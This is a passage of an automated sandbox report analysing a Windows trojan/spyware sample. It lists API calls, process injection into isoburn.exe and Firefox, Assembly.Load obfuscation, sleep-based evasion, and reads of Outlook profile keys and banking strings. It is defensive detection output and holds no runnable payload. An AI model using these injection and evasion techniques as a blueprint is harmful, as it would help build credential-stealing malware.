            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442D30 NtUnmapViewOfSection,LdrInitializeThunk,11_2_05442D30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442DD0 NtDelayExecution,LdrInitializeThunk,11_2_05442DD0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_05442DF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442C60 NtCreateKey,LdrInitializeThunk,11_2_05442C60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_05442C70
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_05442CA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442F30 NtCreateSection,LdrInitializeThunk,11_2_05442F30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442FE0 NtCreateFile,LdrInitializeThunk,11_2_05442FE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442FB0 NtResumeThread,LdrInitializeThunk,11_2_05442FB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442EE0 NtQueueApcThread,LdrInitializeThunk,11_2_05442EE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442E80 NtReadVirtualMemory,LdrInitializeThunk,11_2_05442E80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442B60 NtClose,LdrInitializeThunk,11_2_05442B60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442BE0 NtQueryValueKey,LdrInitializeThunk,11_2_05442BE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_05442BF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442BA0 NtEnumerateValueKey,LdrInitializeThunk,11_2_05442BA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442AD0 NtReadFile,LdrInitializeThunk,11_2_05442AD0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442AF0 NtWriteFile,LdrInitializeThunk,11_2_05442AF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054435C0 NtCreateMutant,LdrInitializeThunk,11_2_054435C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054439B0 NtGetContextThread,LdrInitializeThunk,11_2_054439B0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442D00 NtSetInformationFile,11_2_05442D00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442DB0 NtEnumerateKey,11_2_05442DB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442C00 NtQueryInformationProcess,11_2_05442C00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442CC0 NtQueryVirtualMemory,11_2_05442CC0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442CF0 NtOpenProcess,11_2_05442CF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442F60 NtCreateProcessEx,11_2_05442F60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442F90 NtProtectVirtualMemory,11_2_05442F90
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442FA0 NtQuerySection,11_2_05442FA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442E30 NtWriteVirtualMemory,11_2_05442E30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442EA0 NtAdjustPrivilegesToken,11_2_05442EA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442B80 NtQueryInformationFile,11_2_05442B80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442AB0 NtWaitForSingleObject,11_2_05442AB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05443010 NtOpenDirectoryObject,11_2_05443010
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05443090 NtSetValueKey,11_2_05443090
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05443D70 NtOpenThread,11_2_05443D70
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05443D10 NtOpenProcessToken,11_2_05443D10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02EE4F10 NtCreateFile,11_2_02EE4F10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02EE52C0 NtAllocateVirtualMemory,11_2_02EE52C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02EE5040 NtReadFile,11_2_02EE5040
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02EE5180 NtClose,11_2_02EE5180
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02EE5100 NtDeleteFile,11_2_02EE5100
            Source: PO_YTWHDF3432.exe, 00000000.00000000.1247737261.00000000006A8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameetn.exeH vs PO_YTWHDF3432.exe
            Source: PO_YTWHDF3432.exe, 00000000.00000002.1260659086.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO_YTWHDF3432.exe
            Source: PO_YTWHDF3432.exe, 00000000.00000002.1264411543.0000000006C50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PO_YTWHDF3432.exe
            Source: PO_YTWHDF3432.exe, 00000000.00000002.1261550693.0000000003B6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PO_YTWHDF3432.exe
            Source: PO_YTWHDF3432.exe, 00000003.00000002.1370690975.00000000019DD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO_YTWHDF3432.exe
            Source: PO_YTWHDF3432.exe, 00000003.00000002.1370505830.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameISOBURN.EXEj% vs PO_YTWHDF3432.exe
            Source: PO_YTWHDF3432.exeBinary or memory string: OriginalFilenameetn.exeH vs PO_YTWHDF3432.exe
            Source: PO_YTWHDF3432.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: PO_YTWHDF3432.exeReversingLabs: Detection: 62%
            Source: PO_YTWHDF3432.exeVirustotal: Detection: 80%
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\PO_YTWHDF3432.exe C:\Users\user\Desktop\PO_YTWHDF3432.exe
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess created: C:\Users\user\Desktop\PO_YTWHDF3432.exe C:\Users\user\Desktop\PO_YTWHDF3432.exe
            Source: C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exeProcess created: C:\Windows\SysWOW64\isoburn.exe C:\Windows\SysWOW64\isoburn.exe
            Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO_YTWHDF3432.exe.log
            Source: C:\Windows\SysWOW64\isoburn.exe File created: C:\Users\user\AppData\Local\Temp\7e327r58
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@15/14
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, xT9J6BTYqcjiUV51b1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, xT9J6BTYqcjiUV51b1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, xT9J6BTYqcjiUV51b1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, a8QWheE1fArtTd1IMD.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, a8QWheE1fArtTd1IMD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, a8QWheE1fArtTd1IMD.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, a8QWheE1fArtTd1IMD.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, a8QWheE1fArtTd1IMD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, a8QWheE1fArtTd1IMD.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, a8QWheE1fArtTd1IMD.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, a8QWheE1fArtTd1IMD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, a8QWheE1fArtTd1IMD.csSecurity API names: _0020.AddAccessRule
            Source: PO_YTWHDF3432.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\isoburn.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: PO_YTWHDF3432.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: PO_YTWHDF3432.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: PO_YTWHDF3432.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: firefox.pdbP source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000003.1594930658.0000000008540000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: etn.pdbSHA256 source: PO_YTWHDF3432.exe
            Source: Binary string: isoburn.pdb source: PO_YTWHDF3432.exe, 00000003.00000002.1370505830.0000000001378000.00000004.00000020.00020000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000A.00000002.3730663846.0000000000678000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: isoburn.pdbGCTL source: PO_YTWHDF3432.exe, 00000003.00000002.1370505830.0000000001378000.00000004.00000020.00020000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000A.00000002.3730663846.0000000000678000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qNENczArVjafOgvC.exe, 0000000A.00000002.3723257708.000000000008E000.00000002.00000001.01000000.0000000C.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3723154626.000000000008E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO_YTWHDF3432.exe, 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000003.1372373369.0000000005227000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000003.1370546693.0000000005072000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO_YTWHDF3432.exe, PO_YTWHDF3432.exe, 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 0000000B.00000003.1372373369.0000000005227000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000003.1370546693.0000000005072000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: etn.pdb source: PO_YTWHDF3432.exe
            Source: Binary string: firefox.pdb source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000003.1594930658.0000000008540000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, a8QWheE1fArtTd1IMD.cs .Net Code: uDSZQIBs3w System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO_YTWHDF3432.exe.89f0000.14.raw.unpack, RFebBaClhEWIFvwxqU.cs .Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, a8QWheE1fArtTd1IMD.cs .Net Code: uDSZQIBs3w System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO_YTWHDF3432.exe.29b5318.3.raw.unpack, RFebBaClhEWIFvwxqU.cs .Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO_YTWHDF3432.exe.29e4b30.5.raw.unpack, RFebBaClhEWIFvwxqU.cs .Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, a8QWheE1fArtTd1IMD.cs .Net Code: uDSZQIBs3w System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Code function: 0_2_049D5005 push FFFFFF8Bh; iretd 0_2_049D5007
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Code function: 0_2_08A5DB20 push es; ret 0_2_08A5DB30
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Code function: 3_2_0042B882 push eax; ret 3_2_0042B884
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Code function: 3_2_00401887 push ebp; retf 3_2_00401889
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Code function: 3_2_0040509B push FFFFFFF5h; ret 3_2_0040509F
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Code function: 3_2_0040D1DC pushad ; retf 3_2_0040D1E9
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Code function: 3_2_004049AE push ebp; retf 3_2_004049B0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Code function: 3_2_00401A15 push esp; retf 3_2_00401A2F
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Code function: 3_2_004032D0 push eax; ret 3_2_004032D2
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Code function: 3_2_00413AD2 push ebp; retf 3_2_00413AD5
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Code function: 3_2_00401AF6 push ebp; iretd 3_2_00401AFA
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Code function: 3_2_00407C3E push ecx; ret 3_2_00407C51
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Code function: 3_2_0040CD3A push edx; ret 3_2_0040CD3B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Code function: 3_2_00404DF4 push ebp; retf 3_2_00404DF8
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Code function: 3_2_00429603 push edi; ret 3_2_0042960C
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Code function: 3_2_0041AE3A push ebp; retf 3_2_0041AE3B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Code function: 3_2_0040175B push ebp; retf 3_2_00401774
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Code function: 3_2_018B225F pushad ; ret 3_2_018B27F9
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Code function: 3_2_018B27FA pushad ; ret 3_2_018B27F9
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Code function: 3_2_018E09AD push ecx; mov dword ptr [esp], ecx 3_2_018E09B6
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Code function: 3_2_018B283D push eax; iretd 3_2_018B2858
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Code function: 3_2_018B1368 push eax; iretd 3_2_018B1369
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Code function: 3_2_018B9939 push es; iretd 3_2_018B9940
            Source: C:\Windows\SysWOW64\isoburn.exe Code function: 11_2_053D27FA pushad ; ret 11_2_053D27F9
            Source: C:\Windows\SysWOW64\isoburn.exe Code function: 11_2_053D225F pushad ; ret 11_2_053D27F9
            Source: C:\Windows\SysWOW64\isoburn.exe Code function: 11_2_054009AD push ecx; mov dword ptr [esp], ecx 11_2_054009B6
            Source: C:\Windows\SysWOW64\isoburn.exe Code function: 11_2_053D283D push eax; iretd 11_2_053D2858
            Source: C:\Windows\SysWOW64\isoburn.exe Code function: 11_2_053D1365 push eax; iretd 11_2_053D1369
            Source: C:\Windows\SysWOW64\isoburn.exe Code function: 11_2_02EE2373 pushad ; retf 11_2_02EE2376
            Source: C:\Windows\SysWOW64\isoburn.exe Code function: 11_2_02EE632C push edi; ret 11_2_02EE6339
            Source: C:\Windows\SysWOW64\isoburn.exe Code function: 11_2_02EE6330 push edi; ret 11_2_02EE6339
            Source: PO_YTWHDF3432.exe Static PE information: 0x8451EF9E [Mon May 7 00:11:10 2040 UTC]
            Source: initial sample Static PE information: section name: .text entropy: 7.9060088345737976
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\isoburn.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match File source: Process Memory Space: PO_YTWHDF3432.exe PID: 7680, type: MEMORYSTR
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe TID: 7732 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 1664 Thread sleep count: 138 > 30
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 1664 Thread sleep time: -276000s >= -30000s
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 1664 Thread sleep count: 9834 > 30
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 1664 Thread sleep time: -19668000s >= -30000s
            Source: C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe TID: 7844 Thread sleep time: -75000s >= -30000s
            Source: C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe TID: 7844 Thread sleep count: 37 > 30
            Source: C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe TID: 7844 Thread sleep time: -55500s >= -30000s
            Source: C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe TID: 7844 Thread sleep count: 34 > 30
            Source: C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe TID: 7844 Thread sleep time: -34000s >= -30000s
            Source: C:\Windows\SysWOW64\isoburn.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Code function: 3_2_0192096E rdtsc 3_2_0192096E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\isoburn.exe Window / User API: threadDelayed 9834
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe API coverage: 1.4 %
            Source: C:\Windows\SysWOW64\isoburn.exe API coverage: 2.6 %
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\isoburn.exe Code function: 11_2_02EDC280 FindFirstFileW,FindNextFileW,FindClose, 11_2_02EDC280
            Source: qNENczArVjafOgvC.exe, 0000000D.00000002.3731579280.00000000013BF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM
            Source: 7e327r58.11.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
            Source: 7e327r58.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
            Source: 7e327r58.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe Code function: 3_2_0192096E rdtsc 3_2_0192096E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190245A mov eax, dword ptr fs:[00000030h]3_2_0190245A
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0199A456 mov eax, dword ptr fs:[00000030h]3_2_0199A456
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018D645D mov eax, dword ptr fs:[00000030h]3_2_018D645D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191E443 mov eax, dword ptr fs:[00000030h]3_2_0191E443
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191E443 mov eax, dword ptr fs:[00000030h]3_2_0191E443
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191E443 mov eax, dword ptr fs:[00000030h]3_2_0191E443
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191E443 mov eax, dword ptr fs:[00000030h]3_2_0191E443
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191E443 mov eax, dword ptr fs:[00000030h]3_2_0191E443
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191E443 mov eax, dword ptr fs:[00000030h]3_2_0191E443
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191E443 mov eax, dword ptr fs:[00000030h]3_2_0191E443
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191E443 mov eax, dword ptr fs:[00000030h]3_2_0191E443
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190A470 mov eax, dword ptr fs:[00000030h]3_2_0190A470
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190A470 mov eax, dword ptr fs:[00000030h]3_2_0190A470
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190A470 mov eax, dword ptr fs:[00000030h]3_2_0190A470
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196C460 mov ecx, dword ptr fs:[00000030h]3_2_0196C460
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198678E mov eax, dword ptr fs:[00000030h]3_2_0198678E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E07AF mov eax, dword ptr fs:[00000030h]3_2_018E07AF
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019947A0 mov eax, dword ptr fs:[00000030h]3_2_019947A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EC7C0 mov eax, dword ptr fs:[00000030h]3_2_018EC7C0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019607C3 mov eax, dword ptr fs:[00000030h]3_2_019607C3
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E47FB mov eax, dword ptr fs:[00000030h]3_2_018E47FB
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E47FB mov eax, dword ptr fs:[00000030h]3_2_018E47FB
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196E7E1 mov eax, dword ptr fs:[00000030h]3_2_0196E7E1
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019027ED mov eax, dword ptr fs:[00000030h]3_2_019027ED
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019027ED mov eax, dword ptr fs:[00000030h]3_2_019027ED
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019027ED mov eax, dword ptr fs:[00000030h]3_2_019027ED
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01910710 mov eax, dword ptr fs:[00000030h]3_2_01910710
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191C700 mov eax, dword ptr fs:[00000030h]3_2_0191C700
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E0710 mov eax, dword ptr fs:[00000030h]3_2_018E0710
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195C730 mov eax, dword ptr fs:[00000030h]3_2_0195C730
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191273C mov eax, dword ptr fs:[00000030h]3_2_0191273C
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191273C mov ecx, dword ptr fs:[00000030h]3_2_0191273C
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191273C mov eax, dword ptr fs:[00000030h]3_2_0191273C
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191C720 mov eax, dword ptr fs:[00000030h]3_2_0191C720
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191C720 mov eax, dword ptr fs:[00000030h]3_2_0191C720
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922750 mov eax, dword ptr fs:[00000030h]3_2_01922750
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922750 mov eax, dword ptr fs:[00000030h]3_2_01922750
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01964755 mov eax, dword ptr fs:[00000030h]3_2_01964755
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196E75D mov eax, dword ptr fs:[00000030h]3_2_0196E75D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191674D mov esi, dword ptr fs:[00000030h]3_2_0191674D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191674D mov eax, dword ptr fs:[00000030h]3_2_0191674D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191674D mov eax, dword ptr fs:[00000030h]3_2_0191674D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E0750 mov eax, dword ptr fs:[00000030h]3_2_018E0750
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E8770 mov eax, dword ptr fs:[00000030h]3_2_018E8770
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0770 mov eax, dword ptr fs:[00000030h]3_2_018F0770
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0770 mov eax, dword ptr fs:[00000030h]3_2_018F0770
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0770 mov eax, dword ptr fs:[00000030h]3_2_018F0770
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0770 mov eax, dword ptr fs:[00000030h]3_2_018F0770
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0770 mov eax, dword ptr fs:[00000030h]3_2_018F0770
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0770 mov eax, dword ptr fs:[00000030h]3_2_018F0770
